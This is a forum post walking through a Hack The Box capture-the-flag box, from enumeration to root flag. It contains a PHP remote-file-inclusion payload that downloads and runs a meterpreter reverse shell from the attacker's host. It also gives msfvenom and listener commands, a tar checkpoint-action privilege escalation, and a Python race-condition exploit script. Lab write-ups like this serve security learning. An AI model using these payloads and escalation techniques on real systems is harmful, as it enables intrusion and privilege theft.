Tar Tar root.txt Write Up

_______ .–. ,—. _______ .–. ,—.
|__ |/ /\ \ | .-.| |/ /\ \ | .-.\
)| | / /
\ | -'/ )| | / /__\ \| -’/
() | | __ || ( () | | __ || (
| | | | |)|| |\ \ | | | | |)|| |\ \
-' |_| (_)|_| \)\ -’ || ()|| )\
() ()
.—. .–. .-. .-. ,–, ,—.
( .-.
)/ /\ \ | | | |.’ . .’) | .-’
() \ / /__\ | | | || | () | -. _ \ \ | __ || | | |\ \ | .-' ( -’ )| | |)|| -')| \ -. | --. ----’ || ()`—() ___/( .’
(
)

^^^^^ would be prettier but forum filter is anti-art…apparently spaces are no good…codetag anyone?

by winstein smithe

-±±±enumerate-±±±
dirb is as good a place as any to start

dirb http:/10.10.10.88 /usr/share/dirb/wordlists/common.txt

the ip of course of the victim box

this tells us there are two web services, monstra and wordpress. i dont know much about monstra, but theres lots of wp sites, quality enum tools also.


wpscan will cpme in handy, to discover whats running,

wpscan --url 10.10.10.88/webservices/wp/ --wp-content-dir /wp-content/ --enumerate p

dont pay attentiom to suggested exploits, try em, if ya like rabbit holes.

this should tell you about the plugins. a lil googling tells us, gwolle-gb allows a remote file inclusion opportunity when doing a capture. lets move towards a foot hold.


##$###foothold###$##

on attacking machine
make a file in /var/www/html called wp-load.php
containing:

<?php system("wget http://10.10.*.*:80/shellzbubs -O /tmp/shell; chmod 777 /tmp/shell; /tmp/shell") ?>

10.10.. is the ip of attacking machine within HtB vpn, i wasnt advertising my own ip.


then, create a payload called shellzbubs:

msfvenom -a x86 --platform linux -p linux/x86/meterpreter/reverse_tcp LHOST=10.0.. LPORT=4000 -f elf -o shellbourneid

where LHOST is openVPN “tun0 address” from hackthebox also.


next, in same terminal in the directory containing shellzbub and wp-load, start a SimpleHTTPServer on port 80:

python -m SimpleHTTPServer 80


now you set up a listener. open new terminal, fire up metasploit:
use exploit/multi/handler
set LHOST 10.10..
set LPORT 4000
set PAYLOAD linux/x86/meterpreter_reverse_tcp
exploit

where LH and LP are the same as the payloads

-±±± Exploit That Shit -±±±

in web browser, go to vuln gwolle-gb dir, but call wp-load from your server:

http://10.10.10.88/webservices/wp/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://10.10../

wp-load.php is called automatically by the server, as long as your php tells it to download, change permissions to 777, and run the reverse meterpreter shell, it should connect. you now have a foot hold.

-±±± get user -±±±

find out what sudo can do for you.
sudo -l

we find /bin/tar has onuma user rights, misconfigured.


tar takes wildcards. while one can go clusterfuck route, using a shell script, but i prefer elegance:

sudo -u onuma tar cf /dev/null /tmp/exploit --checkpoint=1 --checkpoint-action=exec=/bin/bash

Sudo asks onuma to run tar with the checkpoint action to execute bin/bash. Because onuma did not properly configure tar’s use permissions, we as another user can run a shell in onuma’s name. Thus allowing us to explore the system as user onuma.

now your user onuma, grab that user.txt file.

-±±±Dance For Root -±±±

											more enumeration

cd /usr/sbin (often home to neat shit)
ls -la | grep root

reveals a lot of intereating options, but the name of the box is a clue, we exploited tar once to esc priv, so we’re looking for something tar related.

backuperer is looking a little odd, not a well-known process, like CD or LS or cat, so it’s worth looking at. Checking its type you see it’s a bash script text file so cat that badmotherfucker and take a look at it. It’s a homemade script that uses tar to back up the website in the event of script kiddies.

this is eye catching,


Backup onuma website dev files.

/usr/bin/sudo -u onuma /bin/tar -zcvf $tmpfile $basedir &

Added delay to wait for backup to complete if large files get added.

/bin/sleep 30

Test the backup integrity

integrity_chk()
{
/usr/bin/diff -r $basedir $check$basedir
}


the sleep after the creation of the tar backup, but before the backup is checked with /diff creates a race condition we can exploit.
its in this 30 seconds that the archive can be “recreated” by the attacker with an added symlink file that points to root.txt flag.

needed a python script to take advantage of a race condition in backuperer.

[also at bottom of post in case pastebin dies]

*first, we create a hidden /var / tmp/ directory and add a simlink pointing to to /root.txt/ into the “live”(where server points 10.10.10.88) /var / www / html/(spaces for forum filter)

*then we backup … /html into our tmp dir, which includes this poisoned simlink. we call this maltar for now.

*now we rm the simlink from the live… /html dir so that the backup created by backuperer will NOT contain the simlink.

*next the script listens for backuperer to run

*then for tar to run

*once tar is running we start looking for the tmpfile backuperer has created.
—this gives us the name of the tar backup
—we’re going to replace, and also lets us
—know the back up has been made, and the
—30 second sleep has begun.

*we wait 15 seconds, for the same reason backuperer waits 30 seconds(giving the backup process time to complete)

*we can now replace the tmpfile backup created by backuperer with our maltar.
—backuperer should take 5-8 100ths of
—a second to complete, so 15 sec in,
—we should have no problems.

*backuperer will now run /diff/ to see if there are changes, which there certainly will be. it spits an error report into a txt file…

*we grep that error log for a flag indicating the contents of the root.txt flag. and pit in on the screen to victory.

*copy n paste root flag on machines page, revel in glory. << not part of the script, but if you can add it, that would be boss.

you now have yhe root flag…but wait, a bpnus round awaits.

At the time of writing im looking for the root shell access.

seems promising, particularily:


  • Attack automation that extracts tar originating from a web
    application or similar sources. Such operation might be performed by
    a setuid root component of the application. The command executed
    could be for example:

    #tar -C / -zxf /tmp/tmp.tgz etc/application var/chroot/application/etc

    The attacker can overwrite /var/spool/cron/crontabs/root to gain code
    execution as root. It is also possible to replace binaries commonly
    executed by root with a backdoored ones, or to drop setuid root
    binaries that will enable the attacker to gain root privileges at
    will. Common attack would be to replace some network facing daemon
    with backdoored one, enabling covert code execution on demand.


in backuperer we find,

/bin/mkdir $check
/bin/tar -zxvf $tmpfile -C $check

im currently investigating the pointy feather option. two ideas,

thinking is to tweak the creation of maltar a bit…
1 create a tar file of /bin/bash holding root privledge from my attacking machine into my webserver dir.
2 from www-data shell wget the maltar, from with in the script into tmp dir that maltar is currently generated locally.
3 add the contents of/var /ww /html/ to mal tar.
4. when backuperer generates the “check” folder it should extracts the contents of html/ to check…how to extract /bin/bash into /bin/ not /check/ bin / is the challenge. maybe a job for wildcards?

  1. less complicated is to overwrite the /shadow file with a hash you know…which i think is the write answer, the question still remains, how to add fresh /etc/shadow to the poisoned tar, and how to get backuperer to run tar with the arguments we want.

    perhaps we can change the contents of backuperers bash variables… $tmpfile and $check are ultimately just strings, containg a file and dir names. but they are only names when used in the comtext of names. the could also be used as arguments.

we need to insert an extra argument telling tar to extract /etc/shadow into /etc/

i think, if we can add " etc/shadow /etc " into $change and make sure theres a known hash shadow file present in maltar, it should over yhe shadow and allow for easy root login.

/bin/tar -zxvf $tmpfile -C $check into
/bin/tar -zxvf $tmpfile -C etc/shadow /etc/

these are just thoughts, but when i figure it out, ill update.

ideas welcome.

the taRooter.py***
#!/usr/bin/env python

#thanks to raiden99 for helping me see
#the right direction and light in the tunnel
#but not holding my hand 2 root
from os import system

import datetime

import os

import subprocess

import time

count = 0

global process_name

process_name = “backuperer”

global tarunnin

tarunnin = “tar”

global sleepyet

sleepyet = “sleep”

global wtdiff

wtdiff = “diff”

global maltar

maltar = “maltar.tar”

#def cleanup():

tmp = os.popen(“rm maltar.tar shell.sh”)

print “clean slate bitches”

return

def create_simlink():

simlinktest = os.popen("ln -s /root/root.txt /var/www/html/boobies.txt").read()

simthere = os.popen("ls -a /var/www/html/ | grep -E 'boobies.txt'").read()

print ("we made " + str(simthere) + " at: " + str(datetime.datetime.now()))

print ""

return

def create_mal_tar():

tmp = os.popen("tar zvcPf " + maltar + " /var/www/html/").read()

tmpchk = os.popen("ls -a " + str(maltar)).read()

print ("file: " + str(tmpchk) + " created at: " + str(datetime.datetime.now()))

print ""

return

def rm_simlink():

tmp = os.popen("rm /var/www/html/boobies.txt").read()

tmpchk = os.popen("ls /var/www/html/ |grep boob*").read()

print ("is there boobie.txt?   " + str(tmpchk))

print ""

return

def check_process(prcssname):

print ("looking for " + prcssname + " at: " + str(datetime.datetime.now()))

while True:

    tmp = os.popen("ps -e").read()

    if prcssname not in tmp[:]:

        continue

    else:

        dttime = datetime.datetime.now()

        print (prcssname + " ran at: " + str(dttime))

        print ""

        break

return

def check_for_tmpfile():

print "lets find that tmpfile name"

while True:

    global tmpfile

    tmpfile = os.popen("ls -a /var/tmp |grep -E '[.]\w{10,}'").read()

    if tmpfile == "":

        continue #keep tryin

    else:

        dttime = datetime.datetime.now()

        print (tmpfile + " is the tmpfile name")

        print ("found at: " + str(dttime))

        print ""

        break

return

def tmpfile_check():

print ("tmpfile variable really global? " + str(tmpfile))

print ""

return

def makin_copies(newtar):

dttime = datetime.datetime.now()

tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()

print ""

print ("hash for legit tar: " + str(tmphash))

print ""

tmp = "#!/bin/bash"

print ("makin copies of " + str(newtar) + " at: " + str(dttime))

tmpsh = os.popen("echo '" + str(tmp) + "' >> shell.sh").read()

tmpsh = os.popen("echo 'cp " + maltar + " /var/tmp/" + tmpfile + "' >> shell.sh").read()

tmpsh = os.popen("chmod +x ./shell.sh").read()

tmpsh = os.popen("sudo -u onuma tar cf /tmp/archive.tar --checkpoint = 1 --checkpoint-action=exec=sh shell.sh").read()

tmphash = os.popen("md5sum /var/tmp/" + str(tmpfile)).read()

print ("new tar hash: " + str(tmphash))

print ""

return

def sleep_a_sec():

dttime = datetime.datetime.now()

print ("waiting 15 sec start now: " + str(dttime))

time.sleep(15)

dttime = datetime.datetime.now()

print ("has it been 5 seconds?" + str(dttime))

print ""

return

def cat_log():

#tmp = os.popen("cat /var/backups/onuma_backup_error.txt |grep boobies.txt").read()

tmp = os.popen("tail -n 50 /var/backups/onuma_backup_error.txt | grep \>").read()

print "hash should be near /"

print ""

print str(tmp)

exit

#cleanup()

startshitright = os.popen(“rmdir /var/tmp/.b && mkdir /var/tmp/.b && cd /var/tmp/.b”).read()

print “started right”

create_simlink()

create_mal_tar()

rm_simlink()

check_process(process_name)

check_process(tarunnin)

check_process(sleepyet)

sleep_a_sec()

check_for_tmpfile()

#makin_copies(tmpfile)

check_process(wtdiff)

#time.sleep(25)

makin_copies(tmpfile)

cat_log()